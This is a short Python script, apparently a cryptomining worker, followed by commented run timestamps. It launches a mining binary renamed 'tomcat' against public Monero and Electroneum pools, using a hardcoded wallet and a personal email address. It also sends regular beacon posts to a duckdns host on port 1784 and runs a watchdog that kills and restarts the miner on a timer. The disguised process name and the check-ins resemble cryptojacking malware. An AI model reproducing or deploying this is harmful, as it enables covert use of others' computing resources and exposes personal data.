import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:07.572628
#2018-02-17 16:49:05.578691
#2018-02-17 18:37:06.519240
#2018-02-17 20:24:03.450928
#2018-02-17 22:11:05.036411
#2018-02-17 23:55:03.130396
#2018-02-18 01:46:03.882852
#2018-02-18 03:33:06.881161
#2018-02-18 05:21:06.228164
#2018-02-18 07:12:08.071285
#2018-02-18 09:00:05.495648
#2018-02-18 10:47:04.052226
#2018-02-18 12:31:03.246478
#2018-02-18 14:18:05.827241
#2018-02-18 16:08:07.444618
#2018-02-18 17:57:05.634412
#2018-02-18 19:44:07.200810
#2018-02-18 21:29:07.413063
#2018-02-18 23:18:06.888940
#2018-02-19 01:06:07.214198
#2018-02-19 02:52:07.822917
#2018-02-19 04:41:04.430563
#2018-02-19 06:25:09.554318
#2018-02-19 08:14:06.452652
#2018-02-19 10:04:03.995247
#2018-02-19 11:53:05.098417
#2018-02-19 13:39:01.331165
#2018-02-19 15:26:06.799297
#2018-02-19 17:14:04.399665
#2018-02-19 19:03:04.450041
#2018-02-19 20:49:02.196602
#2018-02-19 22:36:05.727022
#2018-02-20 00:22:05.180755
#2018-02-20 02:09:07.431418
#2018-02-20 04:01:07.568544
#2018-02-20 05:45:02.171930
#2018-02-20 07:31:04.496375
#2018-02-20 09:15:09.903191
#2018-02-20 10:58:06.205989
#2018-02-20 12:46:01.711292
#2018-02-20 14:32:04.250295
#2018-02-20 16:17:08.856666
#2018-02-20 18:03:10.965428
#2018-02-20 19:55:05.276878
#2018-02-20 21:43:10.952258
#2018-02-20 23:25:05.904255
#2018-02-21 01:11:03.678837
#2018-02-21 02:57:05.963176
#2018-02-21 04:44:04.583822
#2018-02-21 06:32:05.071852
#2018-02-21 08:19:02.148111
#2018-02-21 10:05:08.815793
#2018-02-21 11:53:03.903089
#2018-02-21 13:44:07.915903
#2018-02-21 15:32:09.524250
#2018-02-21 17:22:10.604693
#2018-02-21 19:10:06.770122
#2018-02-21 20:58:02.198833
#2018-02-21 22:45:04.844314
#2018-02-22 00:34:01.679668
#2018-02-22 02:23:04.250297
#2018-02-22 04:09:04.169886
#2018-02-22 05:54:03.449736
#2018-02-22 07:40:10.462731
#2018-02-22 09:28:06.715946
#2018-02-22 11:14:01.336498
#2018-02-22 13:00:09.132331
#2018-02-22 14:47:08.668755
#2018-02-22 16:33:09.946369
#2018-02-22 18:20:07.453252
#2018-02-22 20:12:05.877144
#2018-02-22 22:01:04.045826
#2018-02-22 23:48:02.206905
#2018-02-23 01:37:04.989415
#2018-02-23 03:25:03.679573
#2018-02-23 05:10:08.033968
#2018-02-23 06:56:06.032076
#2018-02-23 08:45:07.668530
#2018-02-23 11:04:08.286294
#2018-02-23 12:58:04.497613
#2018-02-23 14:42:09.153460
#2018-02-23 16:31:10.893356
#2018-02-23 18:17:06.478595
#2018-02-23 20:02:08.573471
#2018-02-23 21:49:01.298758
#2018-02-23 23:41:01.884029
#2018-02-24 01:31:01.888288
#2018-02-24 03:20:09.638977
#2018-02-24 05:06:07.238189
#2018-02-24 06:55:03.581143
#2018-02-24 08:44:05.233424
#2018-02-24 10:39:07.348543
#2018-02-24 12:25:01.112495
#2018-02-24 14:19:07.444283
#2018-02-24 16:06:07.709422
#2018-02-24 17:57:06.112090
#2018-02-24 19:44:05.204470
#2018-02-24 21:30:10.048276
#2018-02-25 01:59:04.039233
#2018-02-25 05:52:01.520305
#2018-02-25 11:37:06.985915